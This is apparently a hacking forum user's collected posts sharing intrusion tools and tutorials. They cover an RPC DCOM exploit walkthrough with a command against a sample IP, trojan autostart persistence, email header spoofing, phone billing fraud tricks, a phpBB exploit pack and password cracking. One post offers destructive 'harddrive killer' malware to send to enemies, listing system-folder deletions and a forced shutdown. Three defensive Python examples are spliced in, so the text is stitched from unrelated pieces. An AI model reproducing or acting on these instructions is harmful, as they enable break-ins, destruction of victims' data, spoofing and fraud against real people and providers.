Posts posted by virusz
-
-
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas, already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.
version 2.6
for windows
http://www.metasploit.com/tools/framework-2.6.exe
for linux and mac and sun
http://www.metasploit.com/images/os/osx.gif
version 3.0
for linux and mac and sun
http://www.metasploit.com/projects/Framework/msf3/download.html?Release=alpha-r3
3nJoy!
-
I don't take responsibility if you get your a*s in jail for using this. Use it at your own risk.
The latest version of the Uncapping Kit from theoryshare. Learn to uncap your modem step by step with pictures. New features include updated firmware and EuroDOCSIS support.
http://rapidshare.de/files/13189106/Cable_Modem_Uncapping_Kit-www.WebXposed.de.rar.html
password: .webxposed.de
-
How to break into an operating system (Windows XP and SP1)
Hi, let's start at the beginning: this "works" both inside and outside the network you are on, but lately internet service providers have closed the ports generally used to exploit systems. I will explain how to do the "job" inside the network; it is done the same way outside, except that you will need luck (that the main ports are not closed). ...there are many methods; I will explain a simple, working one. I assume you have heard of "blaster" or "sasser", maybe you have run into them; they are two viruses that get into a computer without you executing anything or visiting a strange page... Windows XP and Windows XP + SP1 are vulnerable: Windows XP Home and Pro systems are vulnerable to "blaster" and "sasser", Windows XP Pro + SP1 is vulnerable only to "sasser". So what does "blaster" mean? It is the name of a virus that gets into a computer running Windows XP (without updates); it uses ports 135, 139, 445, 539, generally 135. And "sasser" is also a virus similar to "blaster", but it gets in by another method and uses port 445. How we get into a computer that has Windows XP (without updates):
1. Using a search engine, we look for "rpc dcom exploit" (the source is easier to find) and compile the source (if you cannot, search harder and you will also find the exploit already compiled).
2. Also using a search engine, we look for: a. a port scanner with which we scan ports 135, 139, etc... or b. a scanner for the "rpc dcom" vulnerability - a simple option.
3. We need a client (to connect to the "cracked" computer) - putty or NetCat are the best for this. We have everything we need, so let's go: we run the scanner for the "rpc dcom" vulnerability, enter the IPs (the whole class) that we want scanned, and wait until we find a vulnerable computer; let's suppose we found one: 21.242.53.87. We open the console (start > run > cmd), go to where we put the "rpc dcom" exploit, which we assume is named "dcom.exe", and give the command: dcom.exe -d 21.242.53.87 -t 1 -r 0100139d -p 135 -l 7315 After giving the command, if the victim has no firewall, something like "c:\windows\system32" will appear; from here on you only have to plant a trojan on it or open a particular port for yourself... and give it commands, spy on it and so on...
an old method but still working lolikz
-
A very quick half-open portscanner with optional multithreaded protocol specific probing tool.
Download:
http://www.bindshell.net/tools/synscan/syn...can-3.1.tar.bz2
-
This program performs reverse DNS lookups for network blocks or an input file. The requests can be performed multi-threaded.
Usage:
./res <subnet or filename to resolve> <forks>
Download:
http://www.bindshell.net/tools/massresolve/res.c
-
A small utility for quickly and easily generating lists of IP addresses.
Download:
-
look for UpLink, I liked it....
-
===========================================
How to autorun a program in Windows:
===========================================
There are many ways .exe, .bat, .vbs, .com, etc. programs can autostart
on a target computer.
1. Winstart.bat on older systems - Winstart.bat will start with Windows
every time the computer boots on older machines. Any command prompt
commands can be used in the batch file.
===================================================================
2. Startup Folder - The startup folder is the most basic way of getting
an executable to start with Windows. This method is easy to detect and
will be found. If the method is used I would suggest to have it not
matter if it is found (use your imagination) and/or have an alternative
auto startup method as well.
The default startup folder for Windows 9x & ME is found at:
C:\windows\start menu\programs\startup
Windows 2k, XP, 2003 use:
C:\Documents and Settings\Administrator\Start Menu\Programs
(Administrator can be changed to another user name if you know what it
is.)
Any executable files placed in this folder will be automatically
executed at startup.
====================================================================
3. Win.ini & System.ini - The Win.ini & System.ini methods are old
favorites. The files are located in c:\windows or c:\winnt depending on
the version of Windows and where it is installed.
To use Win.ini to autostart your program, first open Win.ini with a text
editor, find [windows] or add it if it's not there, and then add (making
sure the path is right) load=Whatever.exe and then run=Whatever.exe.
Ex.
[windows]
load=Whatever.exe
run=Whatever.exe
System.ini is very simple too: first open System.ini in Notepad and then
find [boot] in the text and add Shell=Explorer.exe Whatever.exe.
Ex.
[boot]
Shell=Explorer.exe Whatever.exe
======================================================================
4. Registry - Registry is probably the most popular method of auto
starting trojans, worms and viruses. Most people do not know how to
remove registry entries or how to even find them via regedit.
To make software run automatically a string can be added to either of
the following registry keys:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
For the above keys all you have to do is add a string with whatever name
you want and data of whatever path to your exe, such as:
Name | Type | Data
-------------------
Windows Update | REG_SZ | c:\windows\system32\Whatever.exe
Another key is:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
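An audit of the autostart locations listed in the post, written from the defending side as an added example (not part of the original post): it reads collected copies of win.ini, system.ini and a registry export and lists every entry that would launch a program at boot or logon. The sample file contents, the allowlist and all function names are constructed for illustration; only the four fully listed Run keys are checked.

```python
import re

# The four Run keys the post lists in full (RunOnceEx is cut off there, so it is left out).
RUN_KEY = re.compile(
    r"^hkey_local_machine\\software\\microsoft\\windows\\currentversion\\"
    r"(run|runonce|runservices|runservicesonce)$", re.I)

def parse_sections(text):
    """Yield (section, name, value) from INI-style or .reg-export text."""
    section = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section is not None:
            name, value = line.split("=", 1)
            name, value = name.strip().strip('"'), value.strip()
            # .reg exports quote the data and double every backslash
            if value.startswith('"') and value.endswith('"'):
                value = value[1:-1].replace("\\\\", "\\")
            yield section, name, value

def find_autostarts(source, text, allow=()):
    """Return (source, section, name, data) for each autostart entry not allowlisted."""
    findings = []
    for section, name, value in parse_sections(text):
        sec, key = section.lower(), name.lower()
        hit = (
            (sec == "windows" and key in ("load", "run") and value)
            # anything other than a bare Explorer.exe as the shell is worth a look
            or (sec == "boot" and key == "shell" and value.lower() != "explorer.exe")
            or RUN_KEY.match(section)
        )
        if hit and value.lower() not in allow:
            findings.append((source, section, name, value))
    return findings

# Constructed samples modelled on the entries shown in the post.
WIN_INI = "[windows]\nload=Whatever.exe\nrun=\n"
SYSTEM_INI = "[boot]\nShell=Explorer.exe Whatever.exe\n"
REG_EXPORT = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Update"="c:\\windows\\system32\\Whatever.exe"
"ctfmon"="c:\\windows\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer]
"Foo"="bar"
'''
# Known-good data values for this (hypothetical) baseline, lower-cased.
ALLOW = {r"c:\windows\system32\ctfmon.exe"}

def audit_samples():
    out = []
    for source, text in (("win.ini", WIN_INI), ("system.ini", SYSTEM_INI),
                         ("hklm.reg", REG_EXPORT)):
        out.extend(find_autostarts(source, text, ALLOW))
    return out

if __name__ == "__main__":
    for finding in audit_samples():
        print(" | ".join(finding))
```

An entry whose name imitates a system component, such as the "Windows Update" value above, still appears in the output because the allowlist matches on the data path and not on the name.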
-
Sending Anonymous Emails
Sometimes it is necessary to send an email anonymously.
There are several web based utilities that allow this, but each one registers the ip info in the headers which allows tracing. They also will not allow you to use a proxy and utilize their service. This is for security reasons.
My definition of anonymous includes the email addresses appearing as if they have been sent from whatever address you specify as well as no accurate record of your IP in the headers of the mail that could be traced back to you.
The method that follows supports my definition of anonymous.
Amazingly, all you need to accomplish this is telnet and a smtp server. Allow me to break it down.
Telnet is a software application that connects one machine to another, allowing you to log on to that other machine as a user.
If you don't have telnet, you can easily download it for free from the web - do a search on "telnet" or "download telnet" in any search engine.
...and just for the sake of being thorough...
What is SMTP?
SMTP stands for "Simple Mail Transfer Protocol"
Basically just a protocol for sending e-mail.
Where do you get a SMTP server?
Here are a few links, but as always be aware that these sites may not be here forever or their content may change. Searching for "SMTP servers" or "SMTP server list" should produce effective results.
http://www.gr0w.com/help/email_help_smtp_servers.htm
http://www.uic.edu/depts/accc/ecomm/smtpmove/isps.html
http://www.thebestfree.net/free/freesmtp.htm
http://www.registerdirect.co.nz/help/smtp_servers.html
http://www.bu.edu/pcsc/email/remote/smtplist.html
Once you've selected a server, open the command prompt, and type:
telnet xxxxxx.com 25
(obviously replace the x's with the SMTP server you've selected)
now type the following:
--------------------------------
HELO targetsmailserver.com
MAIL FROM: whoever@whatever.com
RCPT TO: target@address.com
DATA
from: whoever@whatever.com
subject: whatever
received: xxx.xxx.xxx.xxx
x-header: xxx.xxx.xxx.xxx
The body of the message goes here
.
----------------------------------------
*Note 1: Remember to end with "." on a line by itself as directed.
*Note 2: Adding x-header and received allows you to alter the IP information found in the headers of the mail, making it untraceable and totally anonymous**
*Note 3: There are ISPs that have port 25 (SMTP) blocked. Be sure your settings and ISP allow connections to port 25. If all else fails, get the SMTP server address from your ISP.
That's all it takes to send a totally anonymous email. Hope you enjoyed.
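How an analyst on the receiving side reads the headers of a message sent this way, as an added example that is not part of the original post: every server that handles a message prepends its own Received line recording the address that connected to it, so header lines typed after DATA end up below those. The host names, the trusted-MTA list, the IP addresses (documentation ranges) and the message itself are constructed.

```python
import re
from email import message_from_string

# MTAs run by the recipient's own organisation (assumed name); only their stamps are trusted.
TRUSTED_MTAS = {"mx.recipient.example"}

# A trace field as a real MTA writes it: from <helo> (<rdns> [<ip>]) by <host> ...; <date>
TRACE = re.compile(
    r"^from\s+(?P<helo>\S+)\s+\((?:\S+\s+)?\[(?P<ip>[0-9A-Fa-f.:]+)\]\)"
    r"\s+by\s+(?P<by>\S+)\s.*;\s*(?P<date>.+)$")

# Constructed sample: the message from the post as it would sit in the recipient's mailbox
# after passing through one relay. The last four header lines are the ones typed after DATA.
SAMPLE = """\
Received: from relay.example.net (relay.example.net [192.0.2.10])
\tby mx.recipient.example with ESMTP id 4F2A1; Tue, 02 May 2006 10:15:02 +0000
Received: from targetsmailserver.com (unknown [203.0.113.45])
\tby relay.example.net with SMTP id 9C0D3; Tue, 02 May 2006 10:15:00 +0000
from: whoever@whatever.com
subject: whatever
received: 198.51.100.7
x-header: 198.51.100.7

The body of the message goes here
"""

def trace_origin(raw, trusted=TRUSTED_MTAS):
    """Split Received headers into verified hops, unverified hops and malformed lines."""
    msg = message_from_string(raw)
    verified, unverified, malformed = [], [], []
    in_trusted_chain = True
    # get_all() is case-insensitive and returns headers top (newest) to bottom (oldest)
    for value in msg.get_all("Received", []):
        flat = " ".join(value.split())          # unfold continuation lines
        m = TRACE.match(flat)
        if not m:
            malformed.append(flat)              # not written by any MTA: sender-supplied
            in_trusted_chain = False
            continue
        hop = {"helo": m["helo"], "peer_ip": m["ip"], "by": m["by"]}
        if in_trusted_chain and hop["by"] in trusted:
            verified.append(hop)
        else:
            in_trusted_chain = False            # everything below is a claim, not a fact
            unverified.append(hop)
    return {
        "last_verified_peer": verified[-1]["peer_ip"] if verified else None,
        "verified": verified,
        "unverified": unverified,
        "malformed": malformed,
    }

if __name__ == "__main__":
    report = trace_origin(SAMPLE)
    print("ask this host for its logs:", report["last_verified_peer"])
    for hop in report["unverified"]:
        print("relay recorded client", hop["peer_ip"], "HELO", hop["helo"])
    print("sender-supplied Received lines:", report["malformed"])
```

The relay's own stamp carries the connecting client's address next to the HELO name it claimed, and the relay's logs can corroborate it.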
-
Free SMS Messaging With Nokia
Section 1: The Introduction
----------------------------
Once again here is another tutorial written by yours truly. I was
going to implement this concept into a program, but it came to me
early on that the idea just wasn't going to work. So instead I bring
this information to you in my typical tutorial format. So read, and
enjoy...
Section 2: The Method
----------------------
This method is known to work on the nokia 3210, 5610, and 9110 models.
To perform this trick we will first turn off your phone. Then turn
your phone on and enter your pin. Once you have done this, punch in
the following string...
*#746025625#
If your model works with this trick then you will get a "SIM CLOCK
STOP ALLOWED" message on the screen. That's it, now you can send
sms messages for free. Be warned, this trick sometimes doesn't work
on certain networks so I wouldn't go overboard with this trick until
you receive your first bill. If you get no signs of the sms messaging
you did after performing this trick on your bill then feel free to
chat all you want. Have fun! =)
Section 3: The Conclusion
--------------------------
Well once again I hope you enjoyed reading this as much as I enjoyed
writing this. I'm right now trying to work with programming under the
SymbianOS (for those a bit illiterate in this field, basically,
programming nokia phones) so hopefully you will all see some nokia
apps made by me coming out soon enough. And of course, I have a
couple of tutorial ideas I might pick back up on when I get the chance,
but life has been keeping me busy lately so don't expect any immediate
release of anything. Well anyways, until next time...
-
Making Free Calls With Nokia
Section 1: The Introduction
----------------------------
Tired of wondering if you have gone over your minute limit? Tired of
trying to guess how many minutes you are going to use? Tired of even
paying for the shit? Then this is the tutorial for you. This is a
short and simple tutorial that will teach you, the reader, how to
make free calls on your Nokia cell phone. So let's proceed...
Section 2: So How Do We Do It?
-------------------------------
This technique works on most of the nokia models out today. Meaning
this will work for you as long as you don't have an old fossil sort
of model. So what you will first do is turn on your phone. Then punch
in the code *3001#12345#. This will bring up the NAM programming menu.
From here go down and select the option NAM 1. Once you are in the NAM
1 menu, go down until you see "Emergency Numbers", and enter. You then
go down until you see an empty slot and enter the empty slot. Then
simply punch in the number that you want to call and exit the NAM
programming menu. Now when you dial up the number, the number will be
treated as an emergency call number, which will therefore put the
phone into emergency call mode (which you can exit out of once you are
finished with your call). No number in the emergency call number list
is ever billed to you. There are a couple of other things you can do
from within the NAM programming menu, but that can be saved for another
time, and another tutorial.
Section 3: The Conclusion
--------------------------
Once again I hope you enjoyed reading this as much as I enjoyed
writing this. This trick for the most part only works on the Nokia
60 series, though I believe may also work for a couple of other models.
Be sure to also note that this trick also doesn't work on all
networks. Therefore, if you indeed do have a compatible model, first
try it with just one or two calls before you start going wild. Then
just wait for the bill, and if nothing shows up about the calls you
made with this trick, then feel free to call away. Anyways, until next
time...
Note: If you have a question or comment and feel the need to reach me
then you can do so at murdermouse@informationleak.net and I will try to get back
with you as soon as possible.
-
super nice, stop by here too: http://www.kismetwireless.net/download.shtml
-
Sprajax is the first web security scanner developed specifically to scan AJAX web applications for security vulnerabilities. Denim Group, an IT consultancy specializing in web application security, recognized that there were no tools available on the market able to scan AJAX. AJAX allows web-based applications a higher degree of user-interactivity, a feature with growing popularity among developers.
http://www.denimgroup.com/Sprajax/Default.aspx
-
Actually I released this a bit while ago, but I wasn't active here on Igniteds when I released it so I never had the chance to post it here. Anyways, the Anti School Kit (or simply ASK) offers the following...
Guides
------
Hacking Win98: by Halla
How to bypass restrictions to get to the command prompt: by Halla &
Murder Mouse
Thawing Out DeepFreeze: by Murder Mouse
Hacking The School Network: by Murder Mouse
Hijacking The School PA System: by Murder Mouse
Net Send Time Bomb: by Murder Mouse
How to bypass web filters: by Halla
Hacking Windows NT/2K/XP: by Halla
Tools
-----
Silent Web Cgi Shell: description self-explanatory
bindin: identifies which novell users have what permissions
chknull: cracks novell accounts
Deep UnFreezer: unfreezes affected versions of DeepFreeze
FileDate Changer v1.1: description self-explanatory
Haxernet Explorer v2.01: a browser that uses translation services
to browse sites not allowed by the web filtering software.
NetStumbler: scans and reports wireless access points
OnSite: browses the cached network
Pandora: kit full of novell related warez
SharesFinder: uh, finds open shares of course
SMAC: spoofs MAC address
snlist: CLI app that is used for the same purpose that ONSite is
userdump: naturally dumps a list of users on the network
The programs are meant to complement the guides, and the guides meant to show you how to apply the included tools (in short for some of you who may need to be reminded, don't just jump at the programs, take a little time out of your life to read the tutorials included). Anyways, here is the link, and be sure to tell me what you think (it's like I make a rhyme, every time)...
Download:
-
This is a full hacked kb905474 hotfix.
Just install this as you would normally install the hotfix.
Reboot when installed.
After reboot no more nag screens and you can update again.
Download:
http://files2.9down.com:8000/crack/kb90547...4_1.5.532.2.rar
-
Warning
=======
This information should only be used to test your own server's security. Do not attempt to "test" a website's security without permission from its administrator. Hacking is illegal.
Quick Intro
=========
If you're not familiar with dictionary-based password cracking then this tutorial is not for you.
Using dictionaries to crack passwords can be very frustrating – Especially after you've waited over two days for a program to use a 240MB list that doesn't seem to have that password. So what do you do? There's a way to dramatically increase your chances of cracking that password. How? By making your own dictionary. No, I don’t mean creating a list by hand in notepad (Don't worry it's all mostly automated)
Tools needed
===========
PassParse:
http://darknet.org.uk/content/files/passwo...d/passparse.zip
RemDupes:
http://ksoze.deny.de/RemDupes2.exe
Brutus:
http://217.125.24.22/h/brutus.zip
Intellitamper:
http://www.intellitamper.com/download/inte...amper_v2.07.exe
The Steps
=========
1. Alright. What we need to do first is extract all text from the website. Sounds like a huge task but IntelliTamper will make things a little easier for us. Okay let's open IntelliTamper, enter the website, and press the "Start Search" button. What this will do is find all (or most) pages of the site. Once it's finished, save all the pages it found into one directory on your computer (Right-Click > Save).
2. Now let's navigate to the directory where we saved the files. Next we're gonna make a simple batch file that will read all the files and send the output to a text file named "ppin.txt". Open Notepad and enter the following:
CODE
type *.* > ppin.txt
and save it as "lister.bat" (without quotations of course). Once you've saved it, run it. Ppin.txt should have been created. (Note the file MUST be named ppin)
3. Next we're going to create the actual list itself. If you open ppin.txt you'll see that it's just a bunch of html/text. We're gonna use Pass Parse to extract all the words and put in list format. Alright. Copy the file "ppin.txt" and paste it into the same directory as your Pass Parse program. If there’s already a file named ppin then overwrite it. Now launch Pass Parse. The DOS Prompt should have shown for a second or less. Your new password list, "ppout.txt", was just created.
4. Almost finished. If you open your new password list you'll notice that there are many words used more than once. To take care of the problem we'll use RemDupes. This program will remove all duplicated words and sort your list in alphabetical order. So open your copy of RemDupes, click "Add", and navigate to your password file (ppout.txt). Click "Find Dupes" and when that's finished click "Save List". Your list is completely finished.
"Positive Authentication with User: Admin Password: inagokart"
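The same site-derived word list used from the defending side, as an added example that is not part of the original post: a password-policy check that collects the words visible on an organisation's own pages and rejects new passwords built from them. The sample page, the candidate passwords and the function names are constructed.

```python
import re
from html.parser import HTMLParser

class _VisibleText(HTMLParser):
    """Collect text nodes, skipping <script> and <style> content."""
    def __init__(self):
        super().__init__()
        self.skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self.skip:
            self.skip -= 1

    def handle_data(self, data):
        if not self.skip:
            self.chunks.append(data)

def site_vocabulary(pages, min_len=4):
    """Lower-cased, de-duplicated words of at least min_len letters from saved pages."""
    words = set()
    for html in pages:
        parser = _VisibleText()
        parser.feed(html)
        parser.close()
        text = " ".join(parser.chunks)
        words.update(w.lower() for w in re.findall(r"[A-Za-z]{%d,}" % min_len, text))
    return words

_LEET = str.maketrans("013457@$", "oieastas")

def normalise(password):
    """Undo common decorations: case, leading/trailing digits and symbols, simple leet."""
    core = re.sub(r"^[^a-z]+|[^a-z]+$", "", password.lower())
    return core.translate(_LEET)

def is_site_derived(password, vocab):
    """True if the password is a site word or contains one of five letters or more."""
    core = normalise(password)
    return core in vocab or any(len(w) >= 5 and w in core for w in vocab)

# Constructed sample page standing in for the saved copy of the organisation's site.
PAGES = [
    "<html><head><title>Riverside Karting Club</title>"
    "<style>body{color:red}</style></head>"
    "<body><h1>Welcome to Riverside Karting</h1>"
    "<script>var token='hiddenvalue';</script>"
    "<p>Book a track session with our admin team.</p></body></html>",
]

if __name__ == "__main__":
    vocab = site_vocabulary(PAGES)
    for candidate in ("Karting2006!", "r1vers1de", "t7#Lq9vw-pine"):
        verdict = "reject" if is_site_derived(candidate, vocab) else "accept"
        print(f"{candidate}: {verdict}")
```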
-
MAC SPOOFER is a MAC Address Modifying Utility (spoofer) for Windows 2000, XP, and Server 2003 systems, regardless of whether the manufacturers allow this option or not. MAC SPOOFER is a MUST-HAVE TOOL for IT, Security, Networking professionals, gamers, and everyone who needs a MAC Addresses Changer.
Key Features
Easy usage and simple configuration, highly intuitive interface makes operation easy for both beginners and power users.
Able to manage up to 16 network interfaces.
In detail, it does not change the hardware built-in MAC-address, but changes software based MAC Address on the Windows NT, 2000, XP and 2003.
Display all available network adapters.
Works with wireless network adapters.
Low resource required.
Download:
-
Do not run the 2 harddrive killers yourself, send them to someone.
Do you have an annoying enemy? If so, send him one of the 2 undetected harddrive killers.
The Advanced Batch Helper.exe is a Multiple Hard Drive Killer and kills the victim's harddrive forever; this fine exe makes the enemy's harddrive disc spin at lightspeed. It will kill all drives = c d e f g h i j k l m n o p q r s t u v w x y z and all removable media drives too.
The Setup.exe will delete the victim's or your enemy's
%SystemRoot%\system32
%SystemRoot%\system
%SystemRoot%\Cursors
%SystemRoot%\Fonts
C:\PROGRA~1
C:\DOCUME~1
%systemroute%Windows.halo
and it will
shutdown -s -t 00
exit
the victim's pc
The 2 files are completely undetected by jotti's online virus scanner.
Pass for the file is key
Do not abuse these files.
Download:
-
WebCracker 3.0 Beta 2 (wc30b2.zip) is a password cracker designed to brute force login/password combinations for web sites that use HTTP-based password authentication. [script kiddies read: get free pr0n site access!] Features: supports sessions so you can save and resume cracking from where you left off, automatically logs all valid accounts found, supports running multiple instances so you can crack multiple targets at once, support for proxy servers, allows customized User ID and Password dictionary attacks, automatically tries the user id as the first password - a common weakness on many systems, allows on-the-fly variable replacement so user ids can be incorporated into passwords, allows on-the-fly ID and/or password case changes for case sensitive servers, uses standard HTTP 1.0 calls for compatibility with just about any web site, minimum password length check so you don't send passwords shorter than the target system allows, easy to use interface and options, extremely fast, much more. New in this release: multi-threaded cracking for faster results, now supports CGI and other "non-standard" login scripts, new and much improved user interface, no limit to the size of password lists which can be used, extended logging capabilities, much better progress indicators, statistics screen that provides details about the speed and efficiency of your cracking sessions. Freeware.
Download:
-
ASMCrack is a unix password security tool. It checks the password file by trying whether a given word matches an encrypted password that was within the password file. To do so it uses very speed optimized 386 assembly routines, with pentium alignment and command order optimisations. ASMCrack supports five cracking modes: creating words by the login/gecos field of the pwd file, and try these pwds only on the corresponding user, trying words, that are read from a dictionary file, creating words by Brute Force (e.g. aaa aab aac aad aae aaf aag ... zzy zzz), creating words by Smart Force (this is a statistic optimized modification of Brute Force, that is about 15 times more effective when cracking (pronounceable) pwds that only consist of letters), creating words by combining a certain number of syllables, that have been extracted from a dictionary file. ASMCrack supports parallel processing and clustered computing environments for increased cracking speed. This is the first public release of this program and it rivals John the Ripper in performance and speed.
Download:
-
An Md5 hashes cracker for lists (lists of hashes or lists of words, but an incremental mode is available as well), faster than groar; this version uses a list of hashes (no combo list (user:hash) like in groar). If you need a tool to separate combos into 2 single lists, you can use raptor III, which you can find easily on the web.
download for windows:
http://www.hot.ee/abargadon/PhpBB%20pass%2...20extractor.zip
source code:
http://www.hot.ee/abargadon/PhpBB%20epass%...0source%20C.zip
-
This new release of Kr4ck3r comes equipped with many new features which enhance and simplify the process of auditing MD5 hash.
We have built on the concept of clones by introducing Virtual Clones which run logically in the background while auditing. Also, we've included hands-free progression through-out the entire auditing process.
Knowing the last line of defense is a strong password, we have included a totally new feature to allow operators to audit Md5 hash stored in a remote database. With a totally new design and focus on detail, this version has certainly become the ultimate Md5 hash auditor.
Download:
-
About PHLAK
The story begins with two coffee drinkers from Longview, Texas. James Hartman and Shawn Hawkins were like any other Linux users, hitting Slashdot in the morning, researching numerous open source repositories, and experimenting with interesting projects. Always security minded, the two developers started looking at live security distributions. Never being completely satisfied with existing projects, the two started on a mission to create the most complete live security Linux distribution. So began the research. Instead of starting from scratch they decided to look at some of the other preexisting live CD distributions, finally settling on Morphix due to its modularity. After three months of development the initial version was released. Two months later 0.2 was released with all fifteen pieces of flair.
PHLAK is designed as the security professional's tool kit. It is not meant to turn the inexperienced into a security guru overnight. However, anyone with the desire can learn from the included tools and documentation.
Like any good tool, PHLAK can be used by Sith or Jedi alike. Included in the distribution are all the mainstream tools such as: nmap, nessus, snort, the coroner's toolkit, ethereal, and several other security packages. Some of the other lesser known, yet equally effective, tools include: hping2, proxychains, lczroex, ettercap, kismet, hunt, achilles, brutus, and many others. Make no mistake, this is a real Linux distribution including many common services such as apache, mysql, ssh, iptables, and most other services that are included on any other standard distribution.
To make things more user-friendly, PHLAK currently includes two fast, light-weight window managers, XFCE4 (the default) and Fluxbox. From these window managers the user has easy access to the powerful documentation system. Currently included in the XFCE4 user interface are quick-start buttons to initiate services and different firewall settings for those who are command line impaired.
Remember that PHLAK is still in its infancy. It is constantly progressing towards the level the developers had originally envisioned. The future versions of PHLAK will better harness the modularity of its Morphix origin as well as increase its base of hardware support and detection. The project team is dedicated to expanding and updating the PHLAK security arsenal as well as making it more available to a broader user base. They foresee it becoming the Professional Hacker's Linux Assault Kit. Make no mistake, the Internet is an unfriendly environment. Arm yourself well.
Tool List:
http://www.phlak.org/tools.htm
Downloads:
-
Pack containing phpBB exploits, useful when you're trying to take down a site that is running phpBB.
Download:
http://rapidshare.de/files/3861527/G00B3RS...t_pack.rar.html
ASTALAVISTA SECURITY TOOLBOX DVD v2.0
in Cosul de gunoi (Trash bin)
Posted
Astalavista's Security Toolbox DVD v2.0 is considered to be the largest and most comprehensive Information Security archive. As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools. No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on "how to hack", or an IT Security professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD!
have phun!